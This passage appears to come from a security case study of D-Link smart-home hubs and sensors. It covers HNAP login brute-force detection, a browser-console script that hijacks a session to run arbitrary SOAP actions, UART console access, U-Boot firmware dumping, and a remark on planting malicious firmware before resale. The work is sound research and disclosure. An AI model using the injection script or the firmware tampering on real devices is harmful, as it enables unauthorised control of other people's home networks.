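    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def detect_hnap_bursts(lines, window_s=60, threshold=20):
    """Return {source_ip: time first flagged} for sources that send >= threshold
    POST /HNAP1/ requests within any window_s-second window.
    Threshold and window are assumed values chosen for this example."""
    recent = defaultdict(deque)  # per-source timestamps inside the current window
    flagged = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not m["path"].startswith("/HNAP1"):
            continue  # only HNAP actions (login included) are POSTed to /HNAP1/
        t = datetime.strptime(m["ts"], TS_FMT)
        q = recent[m["src"]]
        q.append(t)
        while (t - q[0]).total_seconds() > window_s:
            q.popleft()  # drop entries that fell out of the window
        if len(q) >= threshold and m["src"] not in flagged:
            flagged[m["src"]] = t
    return flagged


def make_sample_log():
    """Constructed sample: the sensor's lighttpd at 192.168.0.60, one legitimate
    app client (192.168.0.7) and one guessing client (192.168.0.23)."""
    base = datetime(2020, 6, 19, 12, 55, 0, tzinfo=timezone(timedelta(hours=2)))

    def line(src, t, request, status=200):
        return (f'{src} 192.168.0.60 - [{t.strftime(TS_FMT)}] '
                f'"{request} HTTP/1.1" {status} 734 "-" "Mozilla/5.0"')

    lines = [line("192.168.0.7", base, "GET /Login.html")]
    # the app: a few actions spread over two minutes
    lines += [line("192.168.0.7", base + timedelta(seconds=40 * i), "POST /HNAP1/") for i in range(3)]
    # the pace measured above: 100 tries per 20 s, i.e. five login actions per
    # second, every one of them answered with HTTP 200
    lines += [line("192.168.0.23", base + timedelta(seconds=i // 5), "POST /HNAP1/") for i in range(100)]
    return lines


if __name__ == "__main__":
    for src, when in detect_hnap_bursts(make_sample_log()).items():
        print(f"{src}: HNAP request burst, first flagged at {when.isoformat()}")
```

With the sample input only 192.168.0.23 is reported, at the 20th request (three seconds into the burst); the legitimate client's three actions stay well under the threshold. On a device without a lockout, a detector like this is the only thing that distinguishes the brute-force run from ordinary app traffic.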

ⓘ Proof-of-Concept

After authentication and redirection, one is presented with the content of http://$IP/version.txt as shown above. It is possible to extract a lot of information about the device, such as the firmware installed on it, the kernel, the MAC address and several drivers among other things.

Execute SOAP Actions

The first thing examined was the devices' resistance against replay attacks. None of the attempts worked, so it can be concluded that HNAP security is mindful of attacks of this kind. As a result, the web interface was investigated in detail to learn about the employed communication process, as well as for brute-forcing the PIN. It was learned that the login is basically also an HNAP action, which, once completed successfully, establishes a session. All the actions listed in the result of http://$IP/HNAP1/ are executable based on the established keys and authentication values. It is necessary to accentuate that absolutely no keys or values were forged in this examination to successfully execute an HNAP action within an established session. Neither was it necessary to write any kind of script or use a separate SOAP client for the task. The class SoapClient, which is already provided by the webpage, was used to carry out the attack. The only thing altered was the send_login_cmd_result() function, to allow for executing self-composed actions. This function calls an injected function called send_custom_cmd(); it is therefore invoked when a successful login occurs. The second function which was added is send_custom_cmd_result(), which acts as a listener and is called whenever a response is received. Through these minor changes the established session can be exploited to enforce any HNAP action. Fig. 14 shows the execution of the HNAP action GetDeviceSettings, a “get” method for which no parameters need to be set in HNAP_PARAM. Fig. 15 shows the execution of SetAPClientSettings, where parameters have been set to reconfigure the client's access point settings.

ⓘ execute_SOAPaction.inject.js

To execute it, this code has to be pasted into the browser console while the client-side mydlink web page is open. SoapClient, hex_hmac_md5, LOGIN and $ (jQuery) are globals of that page.

var HNAP_ACTION  = "GetDeviceSettings";   // SOAP action to execute once logged in
var HNAP_PARAM   = "";                     // a "get" action needs no parameters

var PIN = "653508";                        // device PIN, as printed on the label

// Sends HNAP_ACTION inside the session that the page's own SoapClient has just
// established. SoapClient reads PrivateKey/Challenge from localStorage itself,
// so nothing has to be recomputed or forged here.
function send_custom_cmd(){
    var client = new SoapClient();
    client.sendRequest(HNAP_ACTION, HNAP_PARAM, send_custom_cmd_result, true);
}

// Listener: called with the XMLHttpRequest as soon as the device answers.
function send_custom_cmd_result(http_req){
    console.log(http_req.responseText);
}

// Overrides the page's login callback; on a successful login it chains
// straight into the custom action.
function send_login_cmd_result(http_req){
    var xmlDoc = $.parseXML(http_req.responseText);
    console.log("Login: " + $(xmlDoc).find(LOGIN + "Result").text());
    send_custom_cmd();
}

// Fill in the PIN and clear stale key material so that the page performs a fresh login.
$("#user_pwd").val(PIN);

localStorage.setItem("PrivateKey", "");
localStorage.setItem("PublicKey", "");
localStorage.setItem("Challenge", "");

console.clear();
ⓘ More complex SOAP action
var WLAN_PASSWORD = AES_Encrypt128("8482c238"); // page helper; encrypts with localStorage.getItem('PrivateKey')

var HNAP_ACTION   = "SetAPClientSettings";
var HNAP_PARAM    = "<RadioID>RADIO_2.4GHz</RadioID>" +
                    "<Enabled>true</Enabled>" +
                    "<SSID>DCH-G020-58F4</SSID>" +
                    "<MacAddress>c4:12:f5:1a:58:f4</MacAddress>" +
                    "<ChannelWidth>1</ChannelWidth>" +
                    "<SupportedSecurity>" +
                        "<SecurityInfo>" +
                            "<SecurityType>WPA2-PSK</SecurityType>" +
                            "<Encryptions><string>AES</string></Encryptions>" +
                        "</SecurityInfo>" +
                    "</SupportedSecurity>" +
                    "<Key>" + WLAN_PASSWORD + "</Key>";
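The session mechanics described above, re-enacted offline as an added example in Python (this is not the page's injected JavaScript and not D-Link's code). Both sides of the exchange are shown: a toy stand-in for the hub issues the challenge and checks the login, and the client derives the session keys, logs in and sends one SOAP action. The page only shows the LoginPassword step, hex_hmac_md5(privateKey, challenge); the PrivateKey derivation, the HNAP_AUTH header layout, the freshness window and the ToyHub checks are assumptions of this example, modelled on D-Link's client-side SoapClient, not the device's actual code:

```python
"""Offline re-enactment of the HNAP login handshake and of one authenticated
SOAP action.  Assumptions (only the LoginPassword step is shown on the page):
  PrivateKey    = HMAC-MD5(key = PublicKey + PIN, msg = Challenge)
  LoginPassword = HMAC-MD5(key = PrivateKey,      msg = Challenge)
  HNAP_AUTH     = HMAC-MD5(key = PrivateKey, msg = ts + '"' + SOAPAction + '"') + " " + ts
ToyHub and AUTH_WINDOW_S are constructed for this example, not the device's logic.
"""
import hashlib
import hmac
import secrets

HNAP_NS = "http://purenetworks.com/HNAP1/"
AUTH_WINDOW_S = 60  # assumed tolerance for the HNAP_AUTH timestamp

def hex_hmac_md5(key: str, msg: str) -> str:
    return hmac.new(key.encode(), msg.encode(), hashlib.md5).hexdigest().upper()

def derive_private_key(public_key: str, pin: str, challenge: str) -> str:
    return hex_hmac_md5(public_key + pin, challenge)

def derive_login_password(private_key: str, challenge: str) -> str:
    return hex_hmac_md5(private_key, challenge)   # the page's hex_hmac_md5(privateKey, challenge)

def hnap_auth(private_key: str, action: str, now: int) -> str:
    ts = str(now)
    return hex_hmac_md5(private_key, ts + '"' + HNAP_NS + action + '"') + " " + ts

def soap_envelope(action: str, params: str = "") -> str:
    return ('<?xml version="1.0" encoding="utf-8"?>'
            '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
            '<soap:Body><' + action + ' xmlns="' + HNAP_NS + '">' + params +
            '</' + action + '></soap:Body></soap:Envelope>')

def build_request(action: str, params: str, private_key: str, cookie: str, now: int) -> dict:
    """What SoapClient.sendRequest(HNAP_ACTION, HNAP_PARAM, ...) puts on the wire."""
    return {"headers": {"SOAPAction": '"' + HNAP_NS + action + '"',
                        "HNAP_AUTH": hnap_auth(private_key, action, now),
                        "Cookie": "uid=" + cookie},
            "body": soap_envelope(action, params)}

class ToyHub:
    """Constructed device side: issues the challenge, checks the login, gates actions."""
    def __init__(self, pin: str):
        self.pin = pin
        self.sessions = {}

    def login_request(self):
        """Login with Action=request: answers with Cookie, Challenge and PublicKey."""
        cookie = secrets.token_hex(5)
        self.sessions[cookie] = {"challenge": secrets.token_hex(10).upper(),
                                 "public_key": secrets.token_hex(10).upper(),
                                 "authenticated": False}
        s = self.sessions[cookie]
        return cookie, s["challenge"], s["public_key"]

    def login(self, cookie: str, login_password: str) -> str:
        """Login with Action=login: the hub derives the same keys from its own PIN."""
        s = self.sessions[cookie]
        s["private_key"] = derive_private_key(s["public_key"], self.pin, s["challenge"])
        expected = derive_login_password(s["private_key"], s["challenge"])
        s["authenticated"] = hmac.compare_digest(expected, login_password)
        return "success" if s["authenticated"] else "failed"

    def handle(self, req: dict, now: int) -> str:
        s = self.sessions.get(req["headers"]["Cookie"].split("=", 1)[1])
        if not s or not s["authenticated"]:
            return "UNAUTHORIZED"
        mac, ts = req["headers"]["HNAP_AUTH"].split(" ")
        action = req["headers"]["SOAPAction"].strip('"')[len(HNAP_NS):]
        if abs(now - int(ts)) > AUTH_WINDOW_S:
            return "STALE"            # a replayed request fails here
        if not hmac.compare_digest(mac, hnap_auth(s["private_key"], action, int(ts)).split(" ")[0]):
            return "BAD_AUTH"         # header does not match the session key or the action
        return "OK"

def run_exchange(hub: ToyHub, pin_guess: str, action: str = "GetDeviceSettings", now: int = 1560000000):
    """Client side: request -> derive keys -> login -> one action within the session."""
    cookie, challenge, public_key = hub.login_request()
    private_key = derive_private_key(public_key, pin_guess, challenge)
    login_result = hub.login(cookie, derive_login_password(private_key, challenge))
    req = build_request(action, "", private_key, cookie, now)
    return login_result, hub.handle(req, now), req

if __name__ == "__main__":
    hub = ToyHub("653508")                     # the PIN used on this page
    print(run_exchange(hub, "653508")[:2])     # ('success', 'OK')
    print(run_exchange(hub, "000000")[:2])     # ('failed', 'UNAUTHORIZED')
```

The example makes the page's two observations tangible: a recorded request replayed later fails on the timestamp in HNAP_AUTH, and an action whose SOAPAction is swapped after signing fails on the MAC, whereas any action sent with the session's own keys succeeds, which is exactly why nothing had to be forged once the page had logged in.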

HNAP0wn

HNAP0wn is a graphical tool for finding devices that use the Home Network Administration Protocol (HNAP) (File:HNAP Protocol.pdf), collecting information about them and injecting commands. It also contains a method to brute-force the PIN of mydlink devices, as mentioned above. More about this tool can be found in the article HNAP0wn: The Home Network Administration Protocol Owner.

Offline

In order to gain a better understanding of how the sensor works and responds to incoming commands, the examination began by physically opening the motion sensor, with the aim of obtaining low-level console access through a Universal Asynchronous Receiver-Transmitter (UART) serial interface, which is found on many embedded devices.

Preliminary examination: Many embedded devices are hard to disassemble. Either they are an ingenious construction of many small parts that do not like to be separated from each other, or a simple clip system that is still hard to open without damaging the enclosure. In any case it is worth consulting the database of the Federal Communications Commission (FCC) before venturing into the hardware. The FCC ID database contains useful information about every device approved by the FCC for the US market. The FCC ID is a unique alphanumeric code that is usually found on the product label, the packaging or online. Its first 3 or 5 characters are the grantee code, which identifies the company that created the product; for FCC ID KA2CHG020A1, for example, the grantee code is KA2. The remaining characters, here CHG020A1, are chosen by the applicant: they often resemble the product model but can be arbitrary. The following documents are accessible by FCC ID (or via the alternative client linked here): test setup photos, test report, cover letter(s), RF exposure info, user manual, ID label/location info, internal photos, external photos, operational description, and schematics and/or block diagram.

These documents must be submitted by the manufacturer to get the device certified and are accessible to anyone. The internal photos are of greatest interest, since they can indicate whether On-Chip Debug (OCD) interfaces such as a UART are exposed on the board. Judging this from a photo takes experience, however, and a photo alone never settles the question: it can only be confirmed by physical inspection, which is explained in the next section. Regional databases of other regulatory bodies may also be useful, since not every device has FCC approval.

Disassembly typically requires a few tools and strong nerves. A small Phillips screwdriver (PH0/PH3) and some plastic opening tools are generally sufficient. In addition, a USB-to-TTL converter (CH340G, available for about a dollar) and a common multimeter were used to determine the pin assignment. Alternative instruments are introduced as needed. A development board such as the Raspberry Pi, which has a UART on its GPIO header, can take over the role of the CH340G.

ⓘ D-Link® DCH-G020: Gateway Connected Home Hub
ⓘ D-Link® DCH-S150: Home Wi-Fi Motion Sensor

On-Chip Debug

CH340G: USB-to-TTL

The Universal Asynchronous Receiver-Transmitter (UART) is a rather old hardware component that is still the standard debugging interface of most microcontrollers and SoCs. Data is transmitted directly over the Transmit (TX) and Receive (RX) lines without handshaking, so no further lines are required; a common GND connection is indispensable for error-free transmission, though. This kind of serial link is referred to as TTL-UART and is only suitable for short distances. The RS-232 standard, by contrast, adds up to six control lines and, more importantly for the practitioner, uses different signalling voltages (roughly ±3 V to ±15 V, with inverted logic), so an RS-232 port or adapter must never be wired directly to a 3.3 V UART. In the following, UART means a TTL-UART (Transistor-Transistor Logic), and no distinction is made between a UART and the more specific USART (Universal Synchronous/Asynchronous Receiver-Transmitter).

Potential UART interfaces can be identified once the device has been disassembled and the PCB is freely accessible. The basic rule is to look for 3 or 4 adjacent pins, holes or pads on the exposed board. They may be placed and labelled in obvious locations, or hidden among other test points. Alternatively, the traces on the PCB can be followed, which is especially useful when searching for hidden interfaces.

Confirmation is still required after a potential UART interface has been identified. A logic analyzer or an oscilloscope is a great help here, since it determines the pin assignment very conveniently. For a UART this is not strictly necessary, because the pin assignment can also be determined with a multimeter and some trial and error. GND is found by a continuity test and VCC by its constant voltage. A UART usually runs at 3.3 V, but 1.8 V or 5 V occur as well. In the best case TX is transmitting while the pins are probed, so a voltage fluctuating between 0 V and VCC can be observed, TX being the active side of the UART. If TX is idle, both lines sit at a constant level, and one has to check which of the two pins reacts to input typed in the terminal and which one delivers the output. The VCC pin does not need to be connected in such a setup and is best left alone, as a wiring mistake can damage the host or the target if their electronics lack suitable protection. In rare cases the GND pin is also omitted; a UART does not have to provide a dedicated GND pin, since any ground point on the PCB will do. The JTAGulator can also be used for convenient UART detection, following the guide "JTAGulator: Find IoT-Device's UART interface", or these quick steps with a common multimeter (DVOM):

  • Ground (GND): Use the continuity test (beeper) of the DVOM. Place one test lead on the pin in question and the other on any ground connection of the PCB, typically an exposed gold-plated contact with nothing soldered to it, or the metal shield of the Wi-Fi chip.
  • Voltage (VCC): Note that this pin can cause damage if misconnected! Set the DVOM to DC voltage with a range just above 5 V. Place one test lead on the pin in question and the other on ground (a plug socket will do). A constant voltage of 1.8 V, 3.3 V or 5 V will be found on exactly one pin.
  • Transmit (TX): The active, sending side of the interface. With the DVOM set as for VCC, this pin shows a fluctuating voltage, since the device (usually) transmits data on it while booting.
  • Receive (RX): The passive, receiving side. With the DVOM set as for VCC, this pin shows a constant voltage (often 0 V if the input floats, or VCC if it is pulled up), since it only listens for incoming data; unlike GND, however, it does not pass the continuity test.

A connection via serial console can be established as soon as a UART interface has been identified and confirmed. Examples of serial console programs are Serial (macOS), minicom (UNIX-like systems) and PuTTY (Windows); with modern computers a USB-to-TTL converter is almost always required. The terminal program has to be configured with the baud rate (bits per second), the number of data bits (7 or 8), the parity (none, even or odd) and the number of stop bits (1 or 2). Setting the baud rate is sufficient in most cases. It can be measured with an oscilloscope or a logic analyzer, or the usual rates, 9600, 19200, 38400, 57600 and 115200 bit/s, are simply tried until something readable appears. A wrong setting mangles the data in both directions, and pure gibberish is displayed. Further settings are rarely necessary, as embedded consoles seldom deviate from the default 8N1, i.e. 8 data bits, no parity and one stop bit. The result is a console on the target device that can be used in the next steps to analyze or extract the firmware.
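The "try the usual rates until something readable appears" step can be automated by scoring what the adapter receives at each rate. The following Python script is an added example, not part of the original page: read_sample() needs a Linux or macOS host with the USB-to-TTL adapter at the given device path and a target that is transmitting (power-cycle it so U-Boot prints its banner), while score_sample() and pick_baud() work on any bytes, so the constructed samples at the bottom let the logic run offline.

```python
"""Score serial captures at the common baud rates and pick the most readable one."""
import os
import select
import termios
import time

COMMON_BAUDS = (9600, 19200, 38400, 57600, 115200)

def score_sample(sample: bytes) -> float:
    """Fraction of bytes that are printable ASCII, TAB, CR or LF. At the wrong
    rate the UART decodes mostly high bytes and control characters."""
    if not sample:
        return 0.0
    good = sum(1 for b in sample if 32 <= b < 127 or b in (9, 10, 13))
    return good / len(sample)

def read_sample(dev: str, baud: int, seconds: float = 3.0) -> bytes:
    """Configure DEV as raw 8N1 at BAUD and collect whatever arrives for SECONDS."""
    fd = os.open(dev, os.O_RDONLY | os.O_NOCTTY | os.O_NONBLOCK)
    try:
        attrs = termios.tcgetattr(fd)              # [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]
        attrs[0] = attrs[1] = attrs[3] = 0         # raw: no input/output processing, no echo
        attrs[2] = termios.CS8 | termios.CREAD | termios.CLOCAL   # 8 data bits, no parity, 1 stop bit
        attrs[4] = attrs[5] = getattr(termios, "B%d" % baud)
        termios.tcsetattr(fd, termios.TCSANOW, attrs)
        termios.tcflush(fd, termios.TCIFLUSH)      # drop bytes received at the previous rate
        chunks, deadline = [], time.monotonic() + seconds
        while time.monotonic() < deadline:
            ready, _, _ = select.select([fd], [], [], 0.2)
            if ready:
                try:
                    chunks.append(os.read(fd, 4096))
                except BlockingIOError:
                    pass
        return b"".join(chunks)
    finally:
        os.close(fd)

def pick_baud(samples: dict) -> tuple:
    """samples maps baud -> captured bytes; returns (best_baud, its score)."""
    best_score, best_baud = max((score_sample(s), b) for b, s in samples.items())
    return best_baud, best_score

def probe(dev: str, bauds=COMMON_BAUDS, seconds: float = 3.0) -> tuple:
    samples = {b: read_sample(dev, b, seconds) for b in bauds}
    for b in bauds:
        print("%7d baud: %3.0f%% printable, %d bytes" % (b, 100 * score_sample(samples[b]), len(samples[b])))
    return pick_baud(samples)

# Constructed samples: the DCH-G020 banner as received at the right rate, and
# typical garbage decoded at a wrong one.
SAMPLE_RIGHT_RATE = b"U-Boot 1.1.4--LSDK-10.1.432 (Mar 17 2015 - 19:24:10)\r\n\r\nap143 - Honey Bee 1.0\r\n"
SAMPLE_WRONG_RATE = bytes([0xFF, 0xFE, 0x80, 0x00, 0x9C, 0x7F, 0x65, 0xE3, 0xF8, 0x00])

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print("best guess:", probe(sys.argv[1]))           # e.g. /dev/ttyUSB0
    else:
        print(pick_baud({115200: SAMPLE_RIGHT_RATE, 9600: SAMPLE_WRONG_RATE}))  # (115200, 1.0)
```

Only the rates that termios knows as constants can be set this way; a non-standard rate such as the 118000 mentioned in the DCH-G020 boot-log note needs pyserial or a logic analyzer instead.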

ⓘ PCB: UART Pinout
Note: When using a Raspberry Pi, GPIO 14 and 15 (pins 8 and 10 on the GPIO header, UART TX and RX) must be reassigned from Bluetooth to the serial console on models that have Bluetooth; the official Raspberry Pi documentation describes how.

After a serial client has been set up in any form, the command-line tool minicom can be used on UNIX-like systems to open the connection. The following bash script starts minicom (e.g. on a Raspberry Pi 2B with /dev/ttyAMA0) and keeps one log file per UART session. It takes the baud rate as first and the serial device as second parameter.

ⓘ openConsole.sh $BAUD_RATE $DEVICE
 #!/bin/bash
 # Usage: openConsole.sh BAUD_RATE DEVICE   e.g. openConsole.sh 115200 /dev/ttyAMA0
 BAUD_RATE=${1:?usage: $0 BAUD_RATE DEVICE}
 DEVICE=${2:?usage: $0 BAUD_RATE DEVICE}
 SPWD="$( cd "$(dirname "$0")" ; pwd -P )"
 mkdir -p "$SPWD/logs"
 LOG="$SPWD/logs/minicom_$(date -u +"%Y-%m-%d_%H:%M:%S").log"
 
 # -b baud rate, -o skip modem initialisation, -D serial device, -C capture the whole session to LOG
 minicom -b "$BAUD_RATE" -o -D "$DEVICE" -C "$LOG"
 
 echo -e "\033[1mLog: \033[0m$LOG"
 echo -e -n "Delete (\033[0;31mrm\033[0m) || Save and See (\033[0;31mcat\033[0m) || Move (\033[0;31mmv\033[0m)? "
 read -r choice
 case "$choice" in
   "rm" ) rm "$LOG";;
   "cat" ) cat "$LOG";;
   "mv" ) read -r -p "Destination (relative to $SPWD): " F && mv "$LOG" "$SPWD/$F";;
 esac
 
 ls -Ali "$SPWD/logs" | sed '/^total/d'   # list the logs without the "total N" line

Bootloader

The bootloader is of great interest. The Universal Bootloader (U-Boot) is probably the most frequently used one in the embedded world. U-Boot offers a command shell that can be entered while the system boots: the autoboot sequence has to be interrupted, for which there are usually a few seconds to press a key; the boot delay and the key to press are shown on the console. The shell can be password protected, which was not the case with any device tested here. From the bootloader several useful actions can be performed, including dumping or updating the firmware: the bootloader runs with the highest privileges and has unrestricted access to the hardware.

ⓘ D-Link® DCH-G020: Gateway Connected Home Hub
ath> ?
?       - alias for 'help'
boot    - boot default, i.e., run 'bootcmd'
bootd   - boot default, i.e., run 'bootcmd'
bootm   - boot application image from memory
cp      - memory copy
erase   - erase FLASH memory
help    - print online help
httpd   -  simple httpd server
md      - memory display
mm      - memory modify (auto-incrementing)
mtest   - simple RAM test
mw      - memory write (fill)
nm      - memory modify (constant address)
ping    - send ICMP ECHO_REQUEST to network host
printenv- print environment variables
progmac - Set ethernet MAC addresses
progmac2 - Set ethernet MAC addresses
reset   - Perform RESET of the CPU
run     - run commands in an environment variable
setenv  - set environment variables
tftpboot- boot image via network using TFTP protocol
version - print monitor version
ath> version

U-Boot 1.1.4--LSDK-10.1.432 (Mar 17 2015 - 19:24:10)
ath> printenv
bootargs=console=ttyS0,115200 root=31:6 rootfstype=squashfs init=/sbin/init mtdparts=ath-nor0:64k(u-boot),64k(ART),64k(MP),64k(config),64k(bootarg),2048k(uImage),12736k(rootfs1),64k(log),512k(mydlink),512k(data1),128k(data2),64k(data3)
bootcmd=bootm 0x9f050000
bootdelay=2
baudrate=115200
ethaddr=0x00:0xaa:0xbb:0xcc:0xdd:0xee
ipaddr=192.168.0.60
serverip=192.168.0.100
dir=
lu=tftp 0x80060000 ${dir}tuboot.bin&&erase 0x9f000000 +$filesize&&cp.b $fileaddr 0x9f000000 $filesize
lf=tftp 0x80060000 ${dir}ap143${bc}-jffs2&&erase 0x9f010000 +$filesize&&cp.b $fileaddr 0x9f010000 $filesize
lk=tftp 0x80060000 ${dir}vmlinux${bc}.lzma.uImage&&erase 0x9f300000 +$filesize&&cp.b $fileaddr 0x9f300000 $filesize
stdin=serial
stdout=serial
stderr=serial
ethact=eth0

Environment size: 754/65532 bytes
ath> 
ⓘ D-Link® DCH-S150: Home Wi-Fi Motion Sensor
ath> ?
?         - alias for 'help'
boot      - boot default, i.e., run 'bootcmd'
bootd     - boot default, i.e., run 'bootcmd'
bootm     - boot application image from memory
cp	      - memory copy
erase     - erase FLASH memory
help      - print online help
md        - memory display
mm        - memory modify (auto-incrementing)
mtest     - simple RAM test
mw        - memory write (fill)
nm        - memory modify (constant address)
ping      - send ICMP ECHO_REQUEST to network host
printenv  - print environment variables
progmac   - Set ethernet MAC addresses
progmac2  - Set ethernet MAC addresses
reset     - Perform RESET of the CPU
run       - run commands in an environment variable
setenv    - set environment variables
tftpboot  - boot image via network using TFTP protocol
version   - print monitor version

ath> printenv

bootargs=console=ttyS0,115200 root=31:08 rootfstype=squashfs init=/sbin/init mtdparts=ath-nor0:64k(u-boot),64k(A)
bootcmd=bootm 0x9f2b0000; setenv bootargs console=ttyS0,115200 root=31:06 rootfstype=squashfs init=/sbin/init m0
bootdelay=2
baudrate=115200
ethaddr=0x00:0xaa:0xbb:0xcc:0xdd:0xee
ipaddr=192.168.0.60
serverip=192.168.0.100
dir=
lu=tftp 0x80060000 ${dir}tuboot.bin&&erase 0x9f000000 +$filesize&&cp.b $fileaddr 0x9f000000 $filesize
lf=tftp 0x80060000 ${dir}ap143${bc}-jffs2&&erase 0x9f010000 +$filesize&&cp.b $fileaddr 0x9f010000 $filesize
lk=tftp 0x80060000 ${dir}vmlinux${bc}.lzma.uImage&&erase 0x9f300000 +$filesize&&cp.b $fileaddr 0x9f300000 $filese

stdin=serial
stdout=serial
stderr=serial
ethact=eth0

Environment size: 1106/65532 bytes
Note: Of the commands U-Boot provides, setenv and tftpboot are particularly interesting for injecting a malicious firmware, e.g. before selling the modified device over the internet to a potential victim. Nothing in the boot log suggests that the kernel image is signed: the "Verifying Checksum" step of a legacy uImage is a CRC check, which a modified image simply carries a fresh value for, and since the shell is not password protected, a few seconds of physical access to the UART during boot are enough.
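Two helpers for working from the U-Boot shell shown above, as an added Python example that is not part of the original page. parse_mtdparts() turns the mtdparts= string from bootargs into a partition table, so that a flash address used by U-Boot (the NOR flash is memory-mapped at 0x9f000000, as the erase and cp.b targets in the environment show) can be translated into a partition and an offset. hexdump_to_bytes() reassembles a `md.b <addr> <len>` transcript captured with minicom -C into a binary, which is how an image can be pulled over the serial console alone, without TFTP. The md.b line layout assumed here is U-Boot's usual "addr: xx xx ... ascii"; the sample transcript is constructed, with only the fields the page prints (magic, data size, load address, entry point) filled in.

```python
"""Partition map and serial-dump helpers for the U-Boot environment shown above."""
import re

FLASH_BASE = 0x9F000000            # NOR base as used by bootcmd/erase/cp.b on both devices
UNITS = {"": 1, "k": 1024, "m": 1024 * 1024}

def parse_mtdparts(bootargs: str) -> list:
    """Return [(name, offset, size)] from 'mtdparts=<dev>:64k(u-boot),...' in bootargs."""
    m = re.search(r"mtdparts=[^:\s]+:(\S+)", bootargs)
    if not m:
        raise ValueError("no mtdparts= in bootargs")
    parts, offset = [], 0
    for size_s, unit, name in re.findall(r"(\d+)([kKmM]?)\(([^)]+)\)", m.group(1)):
        size = int(size_s) * UNITS[unit.lower()]
        parts.append((name, offset, size))
        offset += size
    return parts

def locate(parts: list, addr: int) -> tuple:
    """Map a U-Boot memory address into (partition, offset within the partition)."""
    off = addr - FLASH_BASE
    for name, start, size in parts:
        if start <= off < start + size:
            return name, off - start
    raise ValueError("0x%x is not inside the flash map" % addr)

MD_LINE = re.compile(r"^([0-9a-fA-F]{8}):((?: [0-9a-fA-F]{2})+)")

def hexdump_to_bytes(transcript: str) -> tuple:
    """Reassemble `md.b` output into (start_address, data). Prompts, echoed
    commands and noise are skipped; a gap in the addresses means the capture
    lost lines and raises instead of silently producing a corrupt image."""
    data, start, expect = bytearray(), None, None
    for line in transcript.splitlines():
        m = MD_LINE.match(line.strip())
        if not m:
            continue
        addr = int(m.group(1), 16)
        chunk = bytes.fromhex(m.group(2).replace(" ", ""))
        if start is None:
            start = expect = addr
        if addr != expect:
            raise ValueError("gap in dump at 0x%08x (expected 0x%08x)" % (addr, expect))
        data += chunk
        expect = addr + len(chunk)
    return start, bytes(data)

# bootargs of the DCH-G020 as printed by `printenv` above
G020_BOOTARGS = ("console=ttyS0,115200 root=31:6 rootfstype=squashfs init=/sbin/init "
                 "mtdparts=ath-nor0:64k(u-boot),64k(ART),64k(MP),64k(config),64k(bootarg),"
                 "2048k(uImage),12736k(rootfs1),64k(log),512k(mydlink),512k(data1),128k(data2),64k(data3)")

# Constructed transcript of `md.b 0x9f050000 0x20`: a legacy uImage header with the
# magic 27 05 19 56, the data size 989864 (0x000f1aa8), load address 80002000 and
# entry point 8023dd00 from the boot log; CRCs and timestamp are zeroed, the
# os/arch/type/comp bytes are Linux/MIPS/kernel/lzma.
SAMPLE_DUMP = """ath> md.b 0x9f050000 0x20
9f050000: 27 05 19 56 00 00 00 00 00 00 00 00 00 0f 1a a8    '..V............
9f050010: 80 00 20 00 80 23 dd 00 00 00 00 00 05 05 02 03    .. ..#..........
ath> """

if __name__ == "__main__":
    parts = parse_mtdparts(G020_BOOTARGS)
    for name, start, size in parts:                      # same table the kernel prints as MTD partitions
        print("0x%012x-0x%012x : \"%s\"" % (start, start + size, name))
    print("bootcmd target 0x9f050000 ->", locate(parts, 0x9F050000))
    start, data = hexdump_to_bytes(SAMPLE_DUMP)
    print("dump of 0x%08x, %d bytes, magic %s" % (start, len(data), data[:4].hex()))
```

To dump a whole partition, interrupt autoboot, run e.g. `md.b 0x9f050000 0x200000` for the uImage partition with minicom capturing to a file, and feed the capture to hexdump_to_bytes(); the partition table confirms that 0x9f050000 is the start of "uImage", in line with the MTD map the kernel prints later in the boot log.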

Bootlog

The boot log contains the messages that the bootloader, the kernel, the OS and applications write to standard output (stdout) or standard error (stderr) while the device boots. It is the first wave of information to be processed, because it already reveals entry points and steers the subsequent analysis. A boot log may contain the system status; available firmware images; kernel version and command line; BusyBox version; processor and board information; the memory and storage types used; network interfaces and their configuration; running protocols and applications; firmware and hardware versions; MTD partitions and file systems. These are only a few examples, and developers print all sorts of things, from configuration data and custom debug messages up to clear-text credentials, so a lot of information leaks this way; such leaks make up a large part of the results of this case study. The DCH-G020 log below, for instance, shows the device querying api.dch.dlink.com/agent/upgrade with wget over plain HTTP (port 80), i.e. the upgrade check travels unencrypted.

ⓘ D-Link® DCH-G020: Gateway Connected Home Hub
Note: Power the device up first, then connect GND; RX and TX can be connected beforehand. You may need to remove the battery. You may need to set the baud rate to 118000 (8N1).
U-Boot 1.1.4--LSDK-10.1.432 (Mar 17 2015 - 19:24:10)

ap143 - Honey Bee 1.0

DRAM:  64 MB
Top of RAM usable for U-Boot at: 84000000
Reserving 157k for U-Boot at: 83fd8000
Reserving 192k for malloc() at: 83fa8000
Reserving 44 Bytes for Board Info at: 83fa7fd4
Reserving 36 Bytes for Global Data at: 83fa7fb0
Reserving 128k for boot params() at: 83f87fb0
Stack Pointer at: 83f87f98
Now running in RAM - U-Boot at: 83fd8000
============================================ 
Date:Mar 17 2015  Time:19:24:10
Loader Version: v1.01 Build:01
Module Name: DCH-G020X
============================================ 
Flash Manuf Id 0xc2, DeviceId0 0x20, DeviceId1 0x18
flash size 16MB, sector count = 256
Flash: 16 MB
* Scan for Linux kernel images ...
* Linux kernel found at 9F050000
* Scan completed.
Only one Linux kernel image found.

Using default environment

In:    serial
Out:   serial
Err:   serial
Net:   ath_gmac_enet_initialize...
ath_gmac_enet_initialize: reset mask:c02200 
Scorpion ---->S27 PHY*
S27 reg init
: cfg1 0x800c0000 cfg2 0x7114
eth0: c4:12:f5:1a:58:f4
athrs27_phy_setup ATHR_PHY_CONTROL 4 :1000
athrs27_phy_setup ATHR_PHY_SPEC_STAUS 4 :10
eth0 up
Honey Bee ---->  MAC 1 S27 PHY *
S27 reg init
ATHRS27: resetting s27
ATHRS27: s27 reset done
: cfg1 0x800c0000 cfg2 0x7214
eth1: c4:12:f5:1a:58:f4
athrs27_phy_setup ATHR_PHY_CONTROL 0 :1000
